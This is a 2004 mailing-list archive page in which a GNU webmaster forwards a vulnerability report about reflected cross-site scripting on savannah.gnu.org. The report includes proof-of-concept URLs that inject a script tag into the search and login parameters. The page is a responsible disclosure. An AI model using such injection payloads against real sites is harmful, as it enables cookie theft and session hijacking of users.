[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Savannah-hackers] [gnu.org #216816] Cross-Site Scripting Vulnerability
|
From: |
Justin Pence via RT |
|
Subject: |
[Savannah-hackers] [gnu.org #216816] Cross-Site Scripting Vulnerability on savannah.gnu.org |
|
Date: |
Fri, 10 Dec 2004 08:46:38 -0500 |
Hey, guys. Got a security report that I think you should see. I
already replied to him saying that I'm forwarding this to you guys,
might be a good idea to give him a quick note saying that you've seen
it.
--
Justin Pence
GNU/FSF Webmaster
-----------------------------------
Subject: Cross-Site Scripting Vulnerability on savannah.gnu.org
Date: Wed, 8 Dec 2004 18:30:22 +0100
To: <address@hidden>, <address@hidden>
From: "mikx" <address@hidden>
Hello,
this is a security vulnerability report. Please confirm receipt of
this
email.
__Vulnerability Summary
savannah.gnu.org suffers a Cross-Site Scripting (XSS) vulnerability:
http://savannah.gnu.org/search/?words=";><script>alert(document.cookie)</script><x%20y="&type_of_search=soft&exact=1
and
https://savannah.gnu.org//account/login.php?form_loginname=x";><script>alert(document.cookie)</script><x%20y="
This can be used to obfuscate/fake the output and/or steal cookies by
inserting arbitrary html/javascript code.
__Contact Informations
Please contact me by email or IM, both: address@hidden
Kind regards,
Michael Krax aka mikx
- [Savannah-hackers] [gnu.org #216816] Cross-Site Scripting Vulnerability on savannah.gnu.org,
Justin Pence via RT <=